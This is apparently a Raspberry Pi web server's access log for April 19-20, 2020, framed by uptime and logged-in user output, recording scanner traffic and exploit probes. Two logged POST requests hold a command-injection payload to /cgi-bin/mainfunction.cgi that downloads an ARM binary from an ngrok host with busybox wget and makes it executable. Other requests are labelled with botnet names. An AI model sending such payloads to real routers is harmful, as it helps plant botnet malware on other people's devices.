Sun Apr 19 06:25:14 MDT 2020
 06:25:14 up 54 days, 10:53,  1 user,  load average: 0.31, 0.24, 0.26
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               24Feb20 54days  1:15m  2.53s /usr/bin/lxsession -s LXDE-pi -e LXDE
141.98.80.137 - - [19/Apr/2020:13:31:35 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
171.233.142.218 - - [19/Apr/2020:13:46:43 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
119.64.121.13 - - [19/Apr/2020:14:01:01 +0000] "GET / HTTP/1.1" 400 0 "" ""
45.174.220.57 - - [19/Apr/2020:14:43:39 +0000] "POST /boaform/admin/formPing HTTP/1.1" 400 0 "" "polaris botnet"
45.174.220.57 - - [19/Apr/2020:14:43:39 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
192.241.239.108 - - [19/Apr/2020:16:33:44 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x"
87.18.102.234 - - [19/Apr/2020:17:37:26 +0000] "GET / HTTP/1.1" 400 0 "" ""
81.1.194.254 - - [19/Apr/2020:17:58:44 +0000] "GET / HTTP/1.1" 400 0 "" ""
88.34.126.169 - - [19/Apr/2020:18:00:24 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
73.115.125.128 - - [19/Apr/2020:19:28:23 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC"
73.115.125.128 - - [19/Apr/2020:19:28:23 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
93.174.95.106 - - [19/Apr/2020:19:39:23 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
93.174.95.106 - - [19/Apr/2020:19:39:24 +0000] "GET /robots.txt HTTP/1.1" 200 70 "" ""
93.174.95.106 - - [19/Apr/2020:19:39:24 +0000] "GET /sitemap.xml HTTP/1.1" 200 186 "" ""
93.174.95.106 - - [19/Apr/2020:19:39:24 +0000] "GET /.well-known/security.txt HTTP/1.1" 404 0 "" ""
93.174.95.106 - - [19/Apr/2020:19:39:25 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "" "python-requests/2.22.0"
46.244.94.178 - - [19/Apr/2020:20:18:32 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
176.43.128.2 - - [19/Apr/2020:20:30:15 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x"
203.174.11.198 - - [19/Apr/2020:20:49:26 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
177.9.4.147 - - [19/Apr/2020:21:04:20 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
177.9.4.147 - - [19/Apr/2020:21:04:20 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
167.99.40.21 - - [19/Apr/2020:21:37:20 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
189.132.105.96 - - [19/Apr/2020:21:47:18 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" ""
189.132.105.96 - - [19/Apr/2020:21:47:18 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
167.114.169.17 - - [19/Apr/2020:21:52:39 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
185.153.197.11 - - [19/Apr/2020:21:53:46 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
185.153.197.11 - - [19/Apr/2020:21:59:02 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
208.91.109.18 - - [19/Apr/2020:22:21:55 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
208.91.109.18 - - [19/Apr/2020:22:21:55 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" ""
185.37.57.190 - - [20/Apr/2020:01:43:11 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
121.67.47.146 - - [20/Apr/2020:02:45:10 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
192.99.167.179 - - [20/Apr/2020:02:45:12 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
61.153.110.83 - - [20/Apr/2020:03:03:40 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
61.153.110.83 - - [20/Apr/2020:03:03:44 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
61.153.110.83 - - [20/Apr/2020:03:03:45 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
61.153.110.83 - - [20/Apr/2020:03:03:46 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
61.153.110.83 - - [20/Apr/2020:03:03:46 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
61.153.110.83 - - [20/Apr/2020:03:03:47 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
61.153.110.83 - - [20/Apr/2020:03:03:48 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
61.153.110.83 - - [20/Apr/2020:03:03:48 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
61.153.110.83 - - [20/Apr/2020:03:03:49 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
61.153.110.83 - - [20/Apr/2020:03:03:49 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
143.255.0.225 - - [20/Apr/2020:03:11:23 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
186.226.219.117 - - [20/Apr/2020:03:11:54 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
162.243.132.152 - - [20/Apr/2020:03:33:38 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x"
187.155.1.35 - - [20/Apr/2020:03:49:20 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" ""
187.155.1.35 - - [20/Apr/2020:03:49:20 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
187.73.20.58 - - [20/Apr/2020:04:14:40 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
162.243.134.4 - - [20/Apr/2020:04:44:22 +0000] "GET /manager/text/list HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x"
185.202.2.226 - - [20/Apr/2020:07:30:20 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
77.75.150.57 - - [20/Apr/2020:07:44:34 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC BOTNET"
77.75.150.57 - - [20/Apr/2020:07:44:34 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
85.98.144.215 - - [20/Apr/2020:08:03:25 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
190.152.245.94 - - [20/Apr/2020:09:47:17 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
203.195.174.140 - - [20/Apr/2020:09:51:06 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
203.195.174.140 - - [20/Apr/2020:09:51:06 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
203.195.174.140 - - [20/Apr/2020:09:51:07 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
203.195.174.140 - - [20/Apr/2020:09:51:07 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
203.195.174.140 - - [20/Apr/2020:09:51:08 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
203.195.174.140 - - [20/Apr/2020:09:51:08 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
203.195.174.140 - - [20/Apr/2020:09:51:09 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
203.195.174.140 - - [20/Apr/2020:09:51:09 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
203.195.174.140 - - [20/Apr/2020:09:51:10 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
203.195.174.140 - - [20/Apr/2020:09:51:11 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
121.201.34.11 - - [20/Apr/2020:09:57:09 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
121.201.34.11 - - [20/Apr/2020:09:57:11 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
121.201.34.11 - - [20/Apr/2020:09:57:14 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
121.201.34.11 - - [20/Apr/2020:09:57:39 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
72.76.148.6 - - [20/Apr/2020:10:23:34 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC BOTNET"
72.76.148.6 - - [20/Apr/2020:10:23:34 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
177.86.127.16 - - [20/Apr/2020:11:04:28 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
192.241.238.118 - - [20/Apr/2020:12:13:27 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x"
Mon Apr 20 06:25:06 MDT 2020
 06:25:06 up 55 days, 10:53,  1 user,  load average: 0.29, 0.21, 0.22
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               24Feb20 55days  1:16m  2.53s /usr/bin/lxsession -s LXDE-pi -e LXDE